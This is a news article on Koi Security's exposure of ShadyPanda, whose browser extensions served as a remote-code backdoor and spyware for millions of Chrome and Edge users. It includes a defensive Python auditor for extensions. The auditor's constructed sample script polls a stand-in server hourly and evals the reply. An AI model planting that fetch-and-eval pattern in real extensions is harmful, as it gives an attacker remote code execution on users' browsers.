7 Year Long ShadyPanda Attack Spied on 4.3M Chrome and Edge Users

Koi Security exposes ShadyPanda, a group that used trusted Chrome/Edge extensions to infect 4.3 million users over 7 years for deep surveillance and corporate espionage.

HackRead

Cybersecurity researchers at Koi Security have exposed a massive espionage operation by a group named ShadyPanda that infected over 4.3 million Chrome and Microsoft Edge browser users over approximately seven years. The attackers used a highly patient and sneaky tactic: they uploaded normal-looking extensions, gained user trust, and then quietly converted them into dangerous spyware.

The investigation found two major operations, including a 300,000-user remote code execution (RCE) backdoor using extensions like Clean Master and a separate 4-million-user spyware campaign led by extensions such as WeTab.

**The Evolution of Deception**

ShadyPanda’s success relied on exploiting trust over time, beginning with simple cybercrime. In 2023, the group ran its first large campaign using 145 extensions (disguised as wallpaper or productivity apps) under names like ‘nuggetsno15’ and ‘Zhang’ to conduct affiliate fraud.

They added tracking codes to links for sites like eBay and Amazon, generating hidden commissions. In 2024, they grew bolder, moving to actively control the browser, redirecting searches through a known hijacker called trovi.com and stealing real-time search data. To avoid detection, the malware would also switch to benign behaviour if a security researcher opened the browser’s developer tools.

**The Two Major Active Threats**

Threat 1: The RCE Backdoor Attack (300,000 Users)

This operation played the “long game” by abusing extensions that had operated legitimately for years. Some, like Clean Master (with over 300,000 installs), had even earned Google’s “Featured” and “Verified” statuses. Then, in mid-2024, a silent update transformed them. The automatic update mechanism, designed to keep users secure, became the delivery channel for the malware, and nobody noticed.

These updated extensions effectively became a Remote Code Execution (RCE) backdoor, allowing the attacker to run arbitrary code on an infected computer. The extensions polled an outside server hourly for new commands. This enabled ShadyPanda to monitor nearly everything, from every website a victim visited to a complete “fingerprint” of their browser, Koi Security’s blog post explains.

Source: Koi Security

Threat 2: The Spyware Empire (4 Million Users)

A separate, massive operation involved five other extensions, including WeTab (with three million installs alone), that actively collected data. This included every URL visited, all search queries, and even mouse clicks, with the data being sent to servers in China.
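The two threats above share a recognisable shape: broad host access, permissions that expose browsing activity, and a scheduled remote fetch whose response is executed. The following heuristic audit of an unpacked extension (its `manifest.json` and scripts) is an added example written for this article, not code from Koi Security or HackRead; the permission lists, the sample manifest and the sample script are constructed for illustration.

```python
import json
import re
from pathlib import Path

# Heuristic lists constructed for this example; they are not a Chrome policy.
SURVEILLANCE_PERMS = {"tabs", "webNavigation", "history", "webRequest", "cookies"}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
DYNAMIC_EVAL = re.compile(r"\b(eval|new\s+Function)\s*\(")
REMOTE_FETCH = re.compile(r"\b(fetch|XMLHttpRequest)\b")
PERIODIC = re.compile(r"\b(setInterval|chrome\.alarms\.create)\b")

def audit_manifest(manifest: dict) -> list[str]:
    """Flag manifest entries that would let an extension watch every site."""
    findings = []
    perms = set(manifest.get("permissions", []))
    # Manifest V2 puts host patterns in "permissions"; V3 uses "host_permissions".
    hosts = set(manifest.get("host_permissions", [])) | {p for p in perms if "://" in p or p == "<all_urls>"}
    if hosts & BROAD_HOSTS:
        findings.append("broad host access: " + ", ".join(sorted(hosts & BROAD_HOSTS)))
    if perms & SURVEILLANCE_PERMS:
        findings.append("browsing-observation permissions: " + ", ".join(sorted(perms & SURVEILLANCE_PERMS)))
    csp = manifest.get("content_security_policy", "")
    if isinstance(csp, dict):  # Manifest V3 nests the policy per context
        csp = csp.get("extension_pages", "")
    if "unsafe-eval" in csp:
        findings.append("CSP allows unsafe-eval")
    return findings

def audit_source(js: str) -> list[str]:
    """Flag runtime code evaluation and a recurring network call (command polling)."""
    findings = []
    if DYNAMIC_EVAL.search(js):
        findings.append("dynamic code evaluation (eval/new Function)")
    if REMOTE_FETCH.search(js) and PERIODIC.search(js):
        findings.append("periodic remote fetch (possible command polling)")
    return findings

def audit_extension(ext_dir: Path) -> list[str]:
    """Audit an unpacked extension directory: manifest.json plus every *.js file."""
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))
    findings = audit_manifest(manifest)
    for js_file in sorted(ext_dir.rglob("*.js")):
        findings += [f"{js_file.name}: {f}" for f in audit_source(js_file.read_text(errors="ignore"))]
    return findings

# Constructed sample shaped like the behaviour described in the article:
# broad host access, an hourly alarm, and eval of whatever the server returns.
SAMPLE_MANIFEST = {"manifest_version": 3, "name": "Example Wallpaper Tab",
                   "permissions": ["tabs", "storage", "alarms"], "host_permissions": ["<all_urls>"]}
SAMPLE_JS = """chrome.alarms.create('sync', {periodInMinutes: 60});
chrome.alarms.onAlarm.addListener(() => fetch('https://c2.invalid/cmd').then(r => r.text()).then(t => eval(t)));"""
```

Run `audit_extension(Path("/path/to/unpacked-extension"))` against an extension pulled from a managed browser profile; a clean first release that later gains any of these findings after an update is exactly the pattern the article describes.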

Source: Koi Security

The threat isn’t just limited to individual users. For companies, an infected computer could lead to stolen API keys and compromised internal systems.

This long-running attack exposed a critical weakness: official marketplaces focus too heavily on the initial submission of an extension rather than monitoring its behaviour later. This allowed ShadyPanda to patiently build a massive user base before launching the strike.

The key takeaway is that trust itself proved to be the biggest vulnerability. Users must be cautious of the extensions they install, even those with high ratings, to prevent the next silent attack.

Cybersecurity experts commented on the significance of the ShadyPanda operation, emphasising its risk to businesses. Randolph Barr, Chief Information Security Officer at Cequence Security, highlighted the strategic nature of the attackers.

“The most recent acts of ShadyPanda reveal that they are part of one of the most advanced and long-running browser supply chain efforts we’ve seen. Not only are the technical aspects important, but so is the patience,” said Barr.

He noted how the group leveraged trust, stating, “ShadyPanda demonstrated their commitment to long-term strategies by releasing clean extensions that garnered hundreds of thousands of installs, earning Google’s ‘Featured’ and ‘Verified’ trust badges, and leveraging these badges through consistent updates years later.”

Diane Downie, Senior Software Architect at Black Duck, focused on the difficulty of detection and the need for stricter security: “Malicious code poses a real challenge since it closely resembles legitimate code, leveraging the same convenience features but with bad intent… The ShadyPanda incident shows just how far those bad actors are willing to go.”

She advised organisations to adopt a tougher stance: “As this level of sophistication fast becomes the new normal, organisations need to take a serious zero-trust posture with their systems.”

Trey Ford, Chief Strategy and Trust Officer at Bugcrowd, pointed out a flaw in standard security practices: “ShadyPanda learned that Chrome’s review process, like most enterprise security teams, is focused on initial submissions… and not ongoing behaviour after initial approval.”

He concluded that modern attackers are strategic and patient: “The scariest ones play the long game… requiring continuous vigilance to detect and defend against.”
